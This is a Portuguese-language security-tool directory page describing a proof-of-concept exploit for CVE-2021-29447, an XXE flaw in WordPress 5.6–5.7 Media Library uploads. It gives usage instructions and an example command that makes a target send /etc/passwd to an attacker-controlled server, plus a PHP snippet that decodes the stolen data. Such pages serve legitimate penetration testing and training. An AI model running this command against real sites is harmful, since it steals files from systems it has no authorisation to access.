Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-29447-PoC — Um exploit de prova de conceito para uma vulnerabilidade na biblioteca de mídia do WordPress 5.6 | Kitploit
Ferramentas/GitHubGitHub/0xrar/cve-2021-29447-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHub0xrar/cve-2021-29447-poc

CVE-2021-29447-PoC

Um exploit de prova de conceito para uma vulnerabilidade na biblioteca de mídia do WordPress 5.6

Ver Repositório
61há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-29447 Prova de Conceito

root@kitploit:~
╔═╗╦  ╦╔═╗
║  ╚╗╔╝║╣────2021-29447
╚═╝ ╚╝ ╚═╝
Written By (Isa Ebrahim - 0xRar) on January, 2023

═══════════════════════════════════════════════════════════════════════════
[*] Title: Wordpress XML parsing issue in the Media Library leading to XXE
[*] Affected versions: Wordpress 5.6 - 5.7
[*] Patched version: Wordpress 5.7.1
[*] Installation version: PHP 8
═══════════════════════════════════════════════════════════════════════════

CVE-2021-29447: Um utilizador com capacidade de carregar ficheiros (como um Autor) pode explorar um problema de análise XML na Biblioteca de Média, levando a ataques XXE. Isto requer que a instalação do WordPress esteja a usar PHP 8. O acesso a ficheiros internos é possível num ataque XXE bem-sucedido. Isto foi corrigido na versão 5.7.1 do WordPress, juntamente com as versões afetadas mais antigas através de um lançamento menor.

Este script é fácil de compreender e executar, e automatizará os passos necessários para explorar o ataque XXE na biblioteca de média do WordPress.

Uso

root@kitploit:~
usage: PoC.py [-h] [-l LHOST] [-p PORT] [-f FILE]

options:
  -h, --help            show this help message and exit
  -l LHOST, --lhost LHOST  your server ip address e.g. 10.0.2.15
  -p PORT, --port PORT  your server port e.g. 1337
  -f FILE, --file FILE  system file to read e.g. /etc/passwd

Exemplo:

root@kitploit:~
$ python3 PoC.py -l 10.0.2.15 -p 8000 -f /etc/passwd

Para descodificar o base64, use/execute o seguinte trecho PHP:

root@kitploit:~
<?php
echo zlib_decode(base64_decode('base64_here'));
?>
root@kitploit:~
$ php decode.php

  • Referências:
    • https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh
    • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447
    • https://tryhackme.com/room/wordpresscve202129447
Baixar ferramenta